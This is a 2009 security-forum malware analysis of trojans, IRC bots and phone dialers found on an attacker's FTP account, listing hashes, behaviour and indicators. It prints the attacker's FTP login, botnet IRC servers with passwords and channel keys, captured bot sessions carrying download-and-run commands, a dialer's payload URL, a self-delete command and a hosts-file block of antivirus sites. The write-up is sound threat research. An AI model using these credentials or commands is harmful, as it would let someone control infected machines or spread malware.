An impressive collection of trojans and botnets

']['€AM€LiT€ Forum - News, Reports and Alerts

 Vektor

  2009-08-07
  21:43:16

While checking a forum for trojans, I found an iStealer account (nothing unusual), so I checked the FTP used by it before adding its directories to FTPBot - ftp://ftp.members.lycos.co.uk (user: Acc0n3, password: darkoffice1). I was expecting to see there some logs and at least a failed attempt to make a website. But what I found there was a nice collection of .exe's. Even svchost.exe was there. This is one of those times when everyone knows they are trojans before scanning them with an antivirus. But I was curious - what do all these trojans do? Is there any difference between them? So I checked them all, and these are my findings:

  • OLD/svchost.exe
    Code:
    File size: 397355 bytes
    MD5...: 14dfee6ee798ae0e8e1ddb7ca0346cf2
    SHA1..: d1fa30386c924da83203f3803572efc9a025fd4a
    SHA256: 5d0bd9daa8c57713cdb587f8848ac506c5dc7dcfcc5177a80b52145debb69072
    ssdeep: 6144:TTfAlKngqRCKP7rVuVrvIXaCLcoxHho9GvlQIYHRLu/j7tAQLPso3aIKs:TbY3aC87rVuVcXNcgo9SlOFu/vVbsoKo

    Spy-Net trojan, server: secure-mail.no-ip.biz:3390, client password: abcd1234.

  • aol.exe
    Code:
    File size: 204965 bytes
    MD5...: e55884041c006c26f895febb0e1e79c8
    SHA1..: 6b6f40851200ee7c39b65b10af9f230b802bb9be
    SHA256: 75c1a24a825610e0c25ca2d9bd2a9bdf3fc128855c4f2b9405b66c04b93f8bab
    ssdeep: 6144:JSdF2k7dqhvsICSaMWSUMjcFAyv/OA80:QdFb7dSvsICSUhFAYOA5

    IRC bot, copies itself as %windir%\winlogin.exe.
    • Server: duami.zapto.org:6667 (127.0.0.1 when I checked it)
    • Server password: helm562ray
    • Nickname format: [USA|00|P|%[number 5]] (example: [USA|00|P|36883])
    • Channel: #TuX
    • Channel key: an124


    Code:
    PASS helm562ray
    NICK [USA|00|P|36883]
    USER XP-3776 * 0 :TEST
    MODE [USA|00|P|36883] +ix
    JOIN #TuX an124


  • cyba.exe
    Code:
    File size: 290981 bytes
    MD5...: c58710e159513b5730049f3f1d15041c
    SHA1..: 3c6f71dbf57682937d29a0c53ea692839ca83391
    SHA256: c31426ceb4810bf393acc4de10460f0f055c15a98117dbad113526dd45b719fb
    ssdeep: 6144:JSvF2k7dqhvsICAe9YjzRIMu4Zwqq6g/hWo5/yJ1UeDGCvsV:QvFb7dSvsICAYYucqrWo56J1Uqtv

    IRC bot, copies itself as %systemroot%\winiogon.exe.
    • Server: 5900.zapto.org:5900 (127.0.0.1 when I checked it)
    • Server password: chris000
    • Nickname format: TesT%[number 7] (example: TesT2584411)
    • Channel: #test
    • Channel key: helm
    • Login password for bots: test000


  • d8.exe
    Code:
    File size: 33435 bytes
    MD5...: fb55a50ee03a66b8eb0fec02f0f26c44
    SHA1..: 85a9b117cf0a0e5e36e4989411f3cde90d8fc9f7
    SHA256: 48618cfa479f5f5b3e131e7f2ee14e2939ba92e76d97d1528aed0952cb02e6ac
    ssdeep: 384:CJBbbbbbGDDzzDFD4P22Xl0FwsPlkqTtzjdM6lfS6tLwSiB3nWducgRnh303oGv:CJwFD4P2FZNxzjdDZwSAXWdmaoGv

    Dialer, it downloads a text file with the number to be dialed from http://91.195.118.117/Dialer_Min/number.asp and saves it locally as number.txt.
    number.txt wrote:
    003727091394
    %[your_country]
    %[your_IP]
    1.8
    test disclaimer


  • d80.exe
    Code:
    File size: 24108 bytes
    MD5...: d99ee7f4810e11fb4c871337b45c00cd
    SHA1..: 237bcc06c9816a7aa5e3008762112f3c74f9f5d2
    SHA256: a3ce7bcffa505b978cd4a7ebbd5dc3945094ac32b0287b630d0bfc182ef31c69
    ssdeep: 384:t+N2oe9OmIlu2s1WbsaxAnwPDbAWBSoHvM3waqsSOMeoBnYN:0y0lu2sEBx4iYWBBywaqyoBnu


    Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp.

  • d9.exe
    Code:
    File size: 56364 bytes
    MD5...: 49efd76c281f31b1c679c45fd543857f
    SHA1..: d6200ae364152520e8733a7000e7df678bb05ec5
    SHA256: a4459427462178757b04ce3facf56eec0e97dcdf24e9b44188b8bd7e4f7e3176
    ssdeep: 768:DZ8qC+wnMDs5OFlwWKF9lE8tiy9p0/AoHUUCzeYTS4otit3wRnAXYnQeSr8xd:DgvOFlwdjtiko0XzeYIw5IQzYxd


    Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp.

  • DarkSons.Com.exe
    Code:
    File size: 107986 bytes
    MD5...: 32e7e236244a9492209aafe9b41d37cd
    SHA1..: ce03a796110e5da7e0360e62dc419df0f0f681ab
    SHA256: 07511a72cc236af943f7b4afa84c6f38c5427c9287570087a95eb4d263999855
    ssdeep: 3072:WwxVMhOC/dTDbq91+mno3t4QZQ3rAHL/Zqc:WTfFDbRnOTrAsc


    A WinRAR SFX archive which extracts %windir%\DarkSons.Com.url and executes it (http://adf.ly/H4v).

  • dd.exe
    Code:
    File size: 24108 bytes
    MD5...: d99ee7f4810e11fb4c871337b45c00cd
    SHA1..: 237bcc06c9816a7aa5e3008762112f3c74f9f5d2
    SHA256: a3ce7bcffa505b978cd4a7ebbd5dc3945094ac32b0287b630d0bfc182ef31c69
    ssdeep: 384:t+N2oe9OmIlu2s1WbsaxAnwPDbAWBSoHvM3waqsSOMeoBnYN:0y0lu2sEBx4iYWBBywaqyoBnu


    Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp.

  • dd2.exe
    Code:
    File size: 24108 bytes
    MD5...: d99ee7f4810e11fb4c871337b45c00cd
    SHA1..: 237bcc06c9816a7aa5e3008762112f3c74f9f5d2
    SHA256: a3ce7bcffa505b978cd4a7ebbd5dc3945094ac32b0287b630d0bfc182ef31c69
    ssdeep: 384:t+N2oe9OmIlu2s1WbsaxAnwPDbAWBSoHvM3waqsSOMeoBnYN:0y0lu2sEBx4iYWBBywaqyoBnu


    Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp.

  • drago.exe
    Code:
    File size: 74808 bytes
    MD5...: 5effb43cee44682f2af6589502b7d0c0
    SHA1..: 4f327c3e56c9f59b258976ef0a2c5c4ab07f0873
    SHA256: e5443add501dd577ec5279eaf5c9190bdd3644a71b0f1f61fffac814281db444
    ssdeep: 1536:RAxXfVnwErwjs62olf3yosEgKr0jl2EBZemGmGPBGr:RAxPVnhris62o4olklfZKGr


    Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp. The .exe is encrypted with a VB crypter (compiled: L:\ªª\Desktop\VB\Malware\Crypter\ROCK\rock.vbp).

  • Fixdirs32.exe
    Code:
    File size: 43008 bytes
    MD5...: cc77cca58319ed838c1d03746e1707d4
    SHA1..: 42b1dd7e82dd0c15b50f6e00124df27546d24daf
    SHA256: 0d5d19440c9a7560161c3d8ac949d61d55b23dca134d15483c2b1582488f31b6
    ssdeep: 768:bi0KH7jxgzRNucU5Zvo9ZV/eHl79WYcxMYQBtRlVM1A1pTmTFUC7h42m/MA:W7jYNucdeH19WYcWngAL4uyw


    This trojan had its PE headers edited and it doesn't load on most systems. I assume that on systems that can load it, it executes %ComSpec% /c "for /L %%a in (1,1,20) do del "%s" && ping -n 2 0.0.0.0".

  • FuCk-CrPtD.exe
    Code:
    File size: 127019 bytes
    MD5...: adf15ccd8c387590fc5929a103165a32
    SHA1..: bc9e5e9a1b5e15e69567600112cc7f425a343c8c
    SHA256: 4ca51ea95f19a4feba54230558958faec1c9e1b239dc183932a71f224f6e0267
    ssdeep: 1536:1dY7Ud0VcJ6y3QHTEl5e9XC/sdRuPf11Bu3QeNXJCNiN2Yjsvvvvvvvvvv3vvvvS:10aO4EOWIf43VXSgzUFZq4UTrd


    • IRC server: idem0.p0cetak.eu:5900 (92.243.24.27)
    • Server password: Virus
    • Channel: #FUCk#
    • Nickname format: VirUs-%[letter 8] (example: VirUs-dfjhmchi)
    • Bot information: X0R Fully Recoded!


    Code:
    NICK VirUs-dfjhmchi
    USER VirUs "" "tfy" : 8,18Coded 4By 8VirUs..
    JOIN :#FUCk#


    idem0.p0cetak.eu:5900 wrote:
    :Secret.Virus.Gov NOTICE AUTH :*** Looking up your hostname...
    :Secret.Virus.Gov NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    :Secret.Virus.Gov 001 VirUs-dfjhmchi :Welcome to the Secured Network IRC Network VirUs-dfjhmchi!VirUs@89.123.154.82
    :Secret.Virus.Gov 002 VirUs-dfjhmchi :Your host is Secret.Virus.Gov, running version Unreal3.2.8.1
    :Secret.Virus.Gov 003 VirUs-dfjhmchi :This server was created Fri Jul 24 2009 at 13:02:28 CEST
    :Secret.Virus.Gov 004 VirUs-dfjhmchi Secret.Virus.Gov Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    :Secret.Virus.Gov 005 VirUs-dfjhmchi UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=30 CHANLIMIT=#:30 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
    :Secret.Virus.Gov 005 VirUs-dfjhmchi WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=Secured-Network CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
    :Secret.Virus.Gov 005 VirUs-dfjhmchi EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
    :Secret.Virus.Gov 251 VirUs-dfjhmchi :There are 1 users and 9987 invisible on 1 servers
    :Secret.Virus.Gov 253 VirUs-dfjhmchi 7 :unknown connection(s)
    :Secret.Virus.Gov 254 VirUs-dfjhmchi 4 :channels formed
    :Secret.Virus.Gov 255 VirUs-dfjhmchi :I have 9988 clients and 0 servers
    :Secret.Virus.Gov 265 VirUs-dfjhmchi :Current Local Users: 9988  Max: 15248
    :Secret.Virus.Gov 266 VirUs-dfjhmchi :Current Global Users: 9988  Max: 15248
    :Secret.Virus.Gov 422 VirUs-dfjhmchi :MOTD File is missing
    :VirUs-dfjhmchi MODE VirUs-dfjhmchi :+iwG
    :Secret.Virus.Gov 321 VirUs-dfjhmchi Channel :Users  Name
    :Secret.Virus.Gov 323 VirUs-dfjhmchi :End of /LIST
    PING :Secret.Virus.Gov
    :Secret.Virus.Gov 332 VirUs-dfjhmchi #FUCk# :!NAZELbest http://darkogard.webs.com/pig.jpg update.exe 1
    :Secret.Virus.Gov 333 VirUs-dfjhmchi #FUCk# ogarD 1249217853
    :Secret.Virus.Gov 353 VirUs-dfjhmchi @ #FUCk# :VirUs-dfjhmchi
    :Secret.Virus.Gov 366 VirUs-dfjhmchi #FUCk# :End of /NAMES list.

    :Secret.Virus.Gov 332 VirUs-dfjhmchi #FUCk# :!NAZELbest http://darkogard.webs.com/pig.jpg update.exe 1


    idem0.p0cetak.eu:5900 wrote:
    :VirUs-dfjhmchi!VirUs@89.123.154.82 JOIN :#FUCk#
    :Secret.Virus.Gov 332 VirUs-dfjhmchi #FUCk# :!NAZELbest http://accnew1.freehostia.com/SPreaD-OG.avi update.exe 1
    :Secret.Virus.Gov 333 VirUs-dfjhmchi #FUCk# TuX 1249596793
    :Secret.Virus.Gov 353 VirUs-dfjhmchi @ #FUCk# :VirUs-dfjhmchi
    :Secret.Virus.Gov 366 VirUs-dfjhmchi #FUCk# :End of /NAMES list.


    Backup addresses used by trojans that connect to this server:
    • ogardf.ircdevils.net:5900
    • ogardf.helldark.biz:5900

    What's with this mania of showing fake .gov domain names? Do they feel more secure if they do that?

    update.exe / "pig.jpg" is a phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp .
    Code:
    File size: 48172 bytes
    MD5...: cd13ef0f92d45672a8ee4289f547e158
    SHA1..: 5a27594d9f29c14f40393a4508b7a64c313bb8fe
    SHA256: 32804c6069b8d79f97dc1143f1318087cd4b02e58355be27cf679ea7a6e017bd
    ssdeep: 768:Hbur91acnjN5soJnY/Oj4ghZ8I+zIXX+QcNIqhF+nBrkUoxVlHm6gJEgC:kDlnjjskZ84cNIqhqBrSG/KN


  • h3h3h3.exe
    Code:
    File size: 74808 bytes
    MD5...: 5effb43cee44682f2af6589502b7d0c0
    SHA1..: 4f327c3e56c9f59b258976ef0a2c5c4ab07f0873
    SHA256: e5443add501dd577ec5279eaf5c9190bdd3644a71b0f1f61fffac814281db444
    ssdeep: 1536:RAxXfVnwErwjs62olf3yosEgKr0jl2EBZemGmGPBGr:RAxPVnhris62o4olklfZKGr


    Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp. The .exe is encrypted with a VB crypter (compiled: L:\ªª\Desktop\VB\Malware\Crypter\ROCK\rock.vbp).

  • HuX.exe
    Code:
    File size: 89600 bytes
    MD5...: 53bf95c220752d11a42cd0fefe1f2547
    SHA1..: 207f6c1cd98b60770e277a08f34cf637ff0c790f
    SHA256: 37ffe9ef3f75a844ec56a6fc3b855fb2ecaaa935224091ed749117791566afb4
    ssdeep: 1536:mDv4CfIIvnUS0LgFuI8VUSGDstR4AkvxR0uAiBQN:4hfIQR0LgFKVUKRBkZVg


    • IRC server: huxor.psybnc.cz:3211
    • Channel: #LinuX#
    • Nickname format: [nLh-VNC]%[letter 6] (example: [nLh-VNC]bfztzw)


    Code:
    NICK [nLh-VNC]bfztzw
    USER mmmsfc "fo9.net" "rage" :mmmsfc
    JOIN #LinuX#


    huxor.psybnc.cz:3211 wrote:
    :HuXoR.Gov NOTICE AUTH :*** Looking up your hostname...
    :HuXoR.Gov NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    :HuXoR.Gov 001 [nLh-VNC]bfztzw :Welcome to the Secured Network IRC Network [nLh-VNC]bfztzw!mmmsfc@89.123.154.82
    :HuXoR.Gov 002 [nLh-VNC]bfztzw :Your host is HuXoR.Gov, running version Unreal3.2.8.1
    :HuXoR.Gov 003 [nLh-VNC]bfztzw :This server was created Mon Aug 3 2009 at 05:21:11 CEST
    :HuXoR.Gov 004 [nLh-VNC]bfztzw HuXoR.Gov Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    :HuXoR.Gov 005 [nLh-VNC]bfztzw UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=30 CHANLIMIT=#:30 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
    :HuXoR.Gov 005 [nLh-VNC]bfztzw WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=Secured-Network CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
    :HuXoR.Gov 005 [nLh-VNC]bfztzw EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
    :HuXoR.Gov 251 [nLh-VNC]bfztzw :There are 1 users and 624 invisible on 1 servers
    :HuXoR.Gov 253 [nLh-VNC]bfztzw 11 :unknown connection(s)
    :HuXoR.Gov 254 [nLh-VNC]bfztzw 12 :channels formed
    :HuXoR.Gov 255 [nLh-VNC]bfztzw :I have 625 clients and 0 servers
    :HuXoR.Gov 265 [nLh-VNC]bfztzw :Current Local Users: 625  Max: 2258
    :HuXoR.Gov 266 [nLh-VNC]bfztzw :Current Global Users: 625  Max: 2258
    :HuXoR.Gov 375 [nLh-VNC]bfztzw :- HuXoR.Gov Message of the Day -
    :HuXoR.Gov 372 [nLh-VNC]bfztzw :- 3/8/2009 5:26
    :HuXoR.Gov 372 [nLh-VNC]bfztzw :- .:: Welcome to HuXoR Kingdom ::.
    :HuXoR.Gov 376 [nLh-VNC]bfztzw :End of /MOTD command.
    :[nLh-VNC]bfztzw MODE [nLh-VNC]bfztzw :+iwG
    :HuXoR.Gov 321 [nLh-VNC]bfztzw Channel :Users  Name
    :HuXoR.Gov 323 [nLh-VNC]bfztzw :End of /LIST
    PING :HuXoR.Gov
    :[nLh-VNC]bfztzw!mmmsfc@89.123.154.82 JOIN :#LinuX#
    :HuXoR.Gov 332 [nLh-VNC]bfztzw #LinuX# :!vncstop
    :HuXoR.Gov 333 [nLh-VNC]bfztzw #LinuX# MBoY 1249333403
    :HuXoR.Gov 353 [nLh-VNC]bfztzw @ #LinuX# :[nLh-VNC]bfztzw @drole
    :HuXoR.Gov 366 [nLh-VNC]bfztzw #LinuX# :End of /NAMES list.


  • imbot.exe
    Code:
    File size: 81920 bytes
    MD5...: 2d694f657333c80415681e2261cc4986
    SHA1..: 03166f54b991be74208cfc7a5280b45cf309c1eb
    SHA256: 4e3f71704a1943c53dda8f08007440c6c2f11a29a04879e150de0d62288162d4
    ssdeep: 1536:Cw/081FVBbVcRp4SB+5ZcLAfReL7vGAV/oML://0WBxcRp4SQ5ZwAuGAV/9L


    • IRC server: mandown.homeip.net:6900
    • Server password: darkoffice
    • Channel: #darksons
    • Channel key: darkoffice
    • Nickname format: [%[country]|00|P|%[number 5]]
    • Login password for bots: darkoffice


    Code:
    PASS darkoffice
    NICK [USA|00|P|45129]
    USER XP-1573 * 0 :TEST
    JOIN #darksons darkoffice


    mandown.homeip.net:6900 wrote:
    :irc.oc256.com NOTICE AUTH :*** Looking up your hostname...
    :irc.oc256.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    PING :53D5378D
    :irc.oc256.com 001 [USA|00|P|45129] :Welcome to the oc256 IRC Network [USA|00|P|45129]!XP-1573@89.123.154.82
    :irc.oc256.com 002 [USA|00|P|45129] :Your host is irc.oc256.com, running version Unreal3.2.8.1
    :irc.oc256.com 003 [USA|00|P|45129] :This server was created Sun May 24 15:01:33 2009
    :irc.oc256.com 004 [USA|00|P|45129] irc.oc256.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    :irc.oc256.com 005 [USA|00|P|45129] UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=25 CHANLIMIT=#:25 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
    :irc.oc256.com 005 [USA|00|P|45129] WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=oc256 CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
    :irc.oc256.com 005 [USA|00|P|45129] EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
    :irc.oc256.com 251 [USA|00|P|45129] :There are 1 users and 424 invisible on 1 servers
    :irc.oc256.com 252 [USA|00|P|45129] 1 :operator(s) online
    :irc.oc256.com 254 [USA|00|P|45129] 3 :channels formed
    :irc.oc256.com 255 [USA|00|P|45129] :I have 425 clients and 0 servers
    :irc.oc256.com 265 [USA|00|P|45129] :Current Local Users: 425  Max: 4049
    :irc.oc256.com 266 [USA|00|P|45129] :Current Global Users: 425  Max: 703
    :irc.oc256.com 375 [USA|00|P|45129] :- irc.oc256.com Message of the Day -
    :irc.oc256.com 372 [USA|00|P|45129] :- 27/7/2009 18:27
    :irc.oc256.com 372 [USA|00|P|45129] :- d
    :irc.oc256.com 376 [USA|00|P|45129] :End of /MOTD command.
    :[USA|00|P|45129] MODE [USA|00|P|45129] :+i
    :irc.oc256.com 321 [USA|00|P|45129] Channel :Users  Name
    :irc.oc256.com 323 [USA|00|P|45129] :End of /LIST
    :[USA|00|P|45129]!XP-1573@89.123.154.82 JOIN :#darksons
    :irc.oc256.com 353 [USA|00|P|45129] @ #darksons :[USA|00|P|45129]
    :irc.oc256.com 366 [USA|00|P|45129] #darksons :End of /NAMES list.


    The trojan changes %systemroot%\drivers\etc\hosts (all entries are added twice):

    %systemroot%\drivers\etc\hosts wrote:

    127.0.0.1 www.symantec.com
    127.0.0.1 securityresponse.symantec.com
    127.0.0.1 symantec.com
    127.0.0.1 www.sophos.com
    127.0.0.1 sophos.com
    127.0.0.1 www.mcafee.com
    127.0.0.1 mcafee.com
    127.0.0.1 liveupdate.symantecliveupdate.com
    127.0.0.1 www.viruslist.com
    127.0.0.1 viruslist.com
    127.0.0.1 viruslist.com
    127.0.0.1 f-secure.com
    127.0.0.1 www.f-secure.com
    127.0.0.1 kaspersky.com
    127.0.0.1 kaspersky-labs.com
    127.0.0.1 www.avp.com
    127.0.0.1 www.kaspersky.com
    127.0.0.1 avp.com
    127.0.0.1 www.networkassociates.com
    127.0.0.1 networkassociates.com
    127.0.0.1 www.ca.com
    127.0.0.1 ca.com
    127.0.0.1 mast.mcafee.com
    127.0.0.1 my-etrust.com
    127.0.0.1 www.my-etrust.com
    127.0.0.1 download.mcafee.com
    127.0.0.1 dispatch.mcafee.com
    127.0.0.1 secure.nai.com
    127.0.0.1 nai.com
    127.0.0.1 www.nai.com
    127.0.0.1 update.symantec.com
    127.0.0.1 updates.symantec.com
    127.0.0.1 us.mcafee.com
    127.0.0.1 liveupdate.symantec.com
    127.0.0.1 customer.symantec.com
    127.0.0.1 rads.mcafee.com
    127.0.0.1 trendmicro.com
    127.0.0.1 www.trendmicro.com
    127.0.0.1 www.grisoft.com
    127.0.0.1 www.grisoft.com
    127.0.0.1 virustotal.com
    127.0.0.1 www.virustotal.com
    127.0.0.1 virscan.org
    127.0.0.1 www.virscan.org
    127.0.0.1 scanner.novirusthanks.org
    127.0.0.1 www.scanner.novirusthanks.org
    127.0.0.1 virusscan.jotti.org
    127.0.0.1 www.virusscan.jotti.org
    127.0.0.1 threatexpert.com


  • imfud.exe
    Code:
    File size: 135168 bytes
    MD5...: b2b62b5f1bf4ce08ba12eaf0304175d6
    SHA1..: 1fd14c3ad9330749031193e3ab05d8cfbd767d06
    SHA256: 6bbf27596ec7c38b6e2e0b0a5da1fb6a5c4e1faf7bbfd7beb4a9afbc28124106


    Same IRC trojan as above; it connects to irc://mandown.homeip.net:6900/#darksons. Not so "FUD" anymore.

  • kmeeee.exe
    Code:
    File size: 118828 bytes
    MD5...: 17a91addef20cf4e87a72f9a90bfa355
    SHA1..: 635ba7b2822f662171e87a9ebce70eff33bdeb5b
    SHA256: 9b57336a61367bd4f4c14b87cf842844f931c4803517593d5b015764f8e440ea
    ssdeep: 1536:6JkfDwq/WzTNCzM68c4CVTYMuu3HSI4642+lsQ2yq2ZAhKr0DuhIM:zgzxCz2m3P464VlsVyzZWK8uhIM


    Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp. The .exe is encrypted with a VB crypter (compiled: D:\20-July\S1\ProjectCC.vbp).

  • marin.exe
    Code:
    File size: 58924 bytes
    MD5...: 06a3a8a451b707cfc714715330e7ba30
    SHA1..: 3812a37e337dafecb25157fa02c3bab9dbfcd4d2
    SHA256: f44f1b74ca04d9f897fd588fe07245fd895739d5d8e49aa2ca78f3b6791014d3
    ssdeep: 1536:PDGwbikNYfbjtfThXCRksLFeqX8xm183K:7GwbhUjtfVXCRksLhMxm19


    Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp.

  • msgrrr.exe
    Code:
    File size: 522737 bytes
    MD5...: ecc9f2cdd9b586d45dd9d06f9031cf68
    SHA1..: 8403a8e6c1088a5758c9da019a9a511be0c2384e
    SHA256: b59c3de984b32043b4c469b75419d3d708e8d5094fdedd787cd9831d4fee8218
    ssdeep: 12288:h5+kh+uiKbl+r16SSbCPayJkUR+T4wVT6j5PeE1+ZN6X:z+k6KbG16TbWayKw+T4wVOjHGN6X


    • IRC server: owned.saveyourpicture.com:4321 (78.41.204.48)
    • Channel: #1337
    • Channel key: inhere
    • Nickname format: [1337]%[number 9]
    • Login password for bots: mylogin


    Code:
    NICK [1337]455391923
    USER pilltljaho 0 0 :[1337]455391923
    JOIN #1337 inhere
    USERHOST [1337]455391923
    MODE [1337]455391923 -xi+B


  • MsN.Com.exe
    Code:
    File size: 107961 bytes
    MD5...: ec7942c9516f539d810a457aa6675e3f
    SHA1..: ed9b97f58adbe3af9e4b7ffb7d33d8907e1783ad
    SHA256: fe9e04635d0c5450fea32e6b7bcdac865cbc8ef83ff77b2d6d1e0df947b9ddd9
    ssdeep: 3072:WwxVMhOC/dTDbq91+mno3t4QZQ3rAHL/Zq6:WTfFDbRnOTrAs6


    A WinRAR SFX archive which extracts %windir%\MsN.Com.url and executes it (http://adf.ly/H4x).

  • new.exe
    Code:
    File size: 46592 bytes
    MD5...: 67f5f32622d00fa3d6bb252541a4b2a6
    SHA1..: fdbb1dd2e459761d914fa5fb05bf6284a6559858
    SHA256: b8a44e279a7449af1cdf5aeb5f50590f99c0bffbb51e83507ce89fd8f09dec12
    ssdeep: 768:JDI8Vu6GeZzvFK3bufjMAho68vKqhVFKqHil90yar8brBbS:JDv4CfITvK+Vw90ya4b


    iStealer, FTP: ftp://ftp.members.lycos.co.uk (user: Acc0n3, password: darkoffice1).

  • noob.exe
    Code:
    File size: 39980 bytes
    MD5...: d4f8e1aafa6e96e6eb9a0b3b37614560
    SHA1..: bd6861794486c89f45e337ba44c58bb1f159d428
    SHA256: a07065870f726f7826776dae383f77fdc696dddd75fbc380f9351680d5017a38
    ssdeep: 768:5kMlvT6l+FCiXvgUdnQ/crPKXAgFxrAyC0pQUQ0PmCnGdbYSYT:WMZSyoIQEuwC85+PmCnGFFu


    Phone dialer, it gets phone number and login information from http://91.195.118.117/Dialer_Min/number.asp.

  • ogard.exe
    Code:
    File size: 13312 bytes
    MD5...: 943af3f1a4669dc8db21c5146dfca5df
    SHA1..: 88ce3a91a01c695bfe6e8326840090026d99c264
    SHA256: 766d8173f0a1eb532bbfed9d6c4d6e902b457c6e922b27a456335f7d08f68bc7
    ssdeep: 384:1Xc4AqDJFf/3VDxUnmJW6+yNZ/ZInc5xJ0p:m4A6Ff/3VDxUnd6+yNZ/2IH


    IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk#, as shown above.

  • Ogard-FUCK.exe
    Code:
    File size: 13312 bytes
    MD5...: 943af3f1a4669dc8db21c5146dfca5df
    SHA1..: 88ce3a91a01c695bfe6e8326840090026d99c264
    SHA256: 766d8173f0a1eb532bbfed9d6c4d6e902b457c6e922b27a456335f7d08f68bc7
    ssdeep: 384:1Xc4AqDJFf/3VDxUnmJW6+yNZ/ZInc5xJ0p:m4A6Ff/3VDxUnd6+yNZ/2IH


    IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk#, as shown above.

  • ogardfud.exe
    Code:
    File size: 41984 bytes
    MD5...: 87c8dbce089392358d8e6ca610e10070
    SHA1..: 33a5fee41c56fa8c3996ff4041684209350b104e
    SHA256: 73c634034b4e2e9a97fe3cd6c82b7ccb407a9963161d142be05ad4667c69a2ad
    ssdeep: 768:HDI8Vu6GeZzvFK3bufjMAhodyq0wwZg44uzdEDU2:HDv4CfIqq0wwZg4Hz4v


    IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk#, as shown above (copies itself as c:\OGa\RD\GOx.exe).

  • ogardnew.exe
    Code:
    File size: 66560 bytes
    MD5...: 4860bb01573e9357530a0c4079555e6d
    SHA1..: 1d010b4f7b435b5d1b6425f1ba50f75f20398d9a
    SHA256: f736bed176d050f2fba34e5587a66802d6c9bb7e4e97c68b24e3aa4013271965
    ssdeep: 1536:MWG6qTWoK5cZIlHl3uFhHILREJLCJ+6QTk:MWG6pHRF+/JX5k


    IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk#, as shown above (copies itself as c:\SW\EET\GOx.exe).

  • OG-FUCK.exe
    Code:
    MD5...: 7c02e3ea702b7618b5c6c53d80283e9f
    SHA1..: eb5ddbd1ab6e507d408e679af181c3718e620417
    SHA256: 324e48c016aaeee6c162c63bdfbe20ff0b1fa236cf7094114565b7d7899d8bfb
    ssdeep: 768:MJeAj0xUpc8wVoPn/oZqyWeVC2Eb9sPK9TRFhbAitnps2YQe98rX:2d02pc87n/oZqyW0+bnZqiVYQXX


    IRC bot that connects to irc://idem0.p0cetak.eu:5900/#FUCk#, as shown above (copies itself as c:\SW\EET\GOx.exe).

  • OG-VrX-Flood.exe
    Code:
    File size: 140288 bytes
    MD5...: 9b94cebf536a1ce41d1561a5cffc6aaa
    SHA1..: b729f79887ed3acb5f2dd4d7a25175b1ee52aef9
    SHA256: d12b96e1bf769061625750d0c32d17146b077e6284760ad919012e6084803fec
    ssdeep: 3072:4m1+bxkicnXt+mfdQFxsr3NCoRBy4K2og9QhebyD4Ww0Z+:V+bOdRrrdCoXyXhz4byD7NZ


    • IRC server: ogard5.ircdevils.net:5900 (92.243.24.27) - same host as idem0.p0cetak.eu:5900 (92.243.24.27, see above)
    • Server password: VrX
    • Channel: #fLOOD#
    • Channel key: VrX
    • Nickname format: %[letter 3|4] (example: zks)


    Code:
    PASS VrX
    NICK zks
    USER sf 0 0 :zks
    USERHOST zks
    MODE zks -x+i
    JOIN #fLOOD# VrX


  • packed.exe
    Code:
    File size: 106496 bytes
    MD5...: 72c20287cd5f2578ca44a7216654cb9f
    SHA1..: ac364c4c78e6f364729f6356bb52782962073f51
